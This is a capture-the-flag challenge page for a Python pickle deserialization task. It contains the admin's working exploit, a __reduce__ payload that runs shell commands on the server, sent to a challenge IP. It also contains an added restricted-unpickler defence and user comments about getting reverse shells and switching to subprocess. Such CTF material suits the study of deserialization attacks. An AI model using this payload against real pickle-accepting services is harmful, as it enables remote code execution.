Python Pickle Unserializer

Platform   WEB   Solved

Challenge author: Hel1antHu5

First blood: masterluo

First blood reward: 5 gold coins

Solves: 58

Hint:

Description: flag{}

Site admin's write-up:

import base64
import pickle

import httpx

class A:
    def __reduce__(self):
        import subprocess
        s = '''
import subprocess

r = subprocess.run(
    'cat flag', 
    shell=True,
    check=True,
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT
)
print(r.stdout.decode())
        '''
        return (subprocess.check_output, (["python3","-c",s],))


a = A()
data = {
    'payload': base64.b64encode(pickle.dumps(a)).decode()
}
a = base64.b64decode(data['payload'])
r = httpx.put('http://114.67.175.224:17271/flag', json=data)
print(r.text)
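
The defensive counterpart to the write-up above, as an added example that is not part of the original page or the challenge's code: a restricted unpickler that refuses every global lookup, plus an opcode scan for logging. It assumes the server base64-decodes the `payload` field and unpickles it; `ALLOWED_GLOBALS`, `safe_loads`, `has_call_opcodes` and the sample inputs are hypothetical names and constructed data.

```python
import base64
import io
import os
import pickle
import pickletools

# Assumption: the endpoint only needs plain containers and scalars, so no
# global is ever legitimate. Extend this allow-list deliberately if needed.
ALLOWED_GLOBALS = frozenset()

class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup not on the allow-list."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def safe_loads(b64_payload):
    """Decode a base64 'payload' field and unpickle it with globals blocked."""
    raw = base64.b64decode(b64_payload, validate=True)
    return RestrictedUnpickler(io.BytesIO(raw)).load()

RISKY_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
             "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def has_call_opcodes(raw):
    """Static triage for logging: can this stream import or call anything?"""
    return any(op.name in RISKY_OPS for op, _arg, _pos in pickletools.genops(raw))

class _Sample:
    """Constructed test object: same __reduce__ mechanism, harmless callable."""

    def __reduce__(self):
        return (os.getcwd, ())

def demo():
    benign = base64.b64encode(pickle.dumps({"user": "alice", "n": 3})).decode()
    crafted_raw = pickle.dumps(_Sample())  # pickling never runs the callable
    try:
        safe_loads(base64.b64encode(crafted_raw).decode())
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return safe_loads(benign), blocked, has_call_opcodes(crafted_raw)

if __name__ == "__main__":
    print(demo())
```

The opcode scan is triage for logs only; the enforcement is `find_class`. Where the data is JSON-compatible, replacing pickle with `json` on the endpoint removes the deserialization path entirely.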


Cyberbolt @ 2023-06-07 23:21:07 👍1

The simplest method: https://github.com/Cyberbolt/-WriteUp-Python-Pickle-Unserializer


jinmu @ 2023-06-07 23:21:07 👍0

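Someone earlier has already explained it in great detail. If you can't get a reverse shell, it may really be a problem on your own side; for me, rolling back my Alibaba Cloud server to a snapshot fixed it.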


samsung206bw @ 2023-06-07 23:21:07 👍0

Finally succeeded after countless simulated attempts.


samsung206bw @ 2023-06-07 23:21:07 👍0

@XiLitter https://blog.csdn.net/prosche_1107/article/details/126840631?spm=1001.2014.3001.5501


samsung206bw @ 2023-06-07 23:21:07 👍0

@XiLitter Yes, you need to set up a control machine reachable from the public internet to receive the reverse shell. Note: return (subprocess.call, (["python3","-c",s],))


XiLitter @ 2023-06-07 23:21:07 👍0

Master, do I need to define my own class and then use __reduce__ to get a reverse shell? I tried that but didn't succeed; I'd appreciate your guidance.


云牧青 @ 2022-06-07 23:21:07 👍3

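How do you do this? It feels like the target machine has no outbound internet access; even a wget to Baidu gets no response for ages. There is also no output echoed back, just a 500 error. I set it up myself and found that the command does execute, but an error is raised on return. The error message is TypeError: The view function did not return a valid response. The return type must be a string, dict, tuple, Response inst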


Fitz_临风 @ 2023-06-07 23:21:07 👍0

Just use subprocess instead of os.system and it works.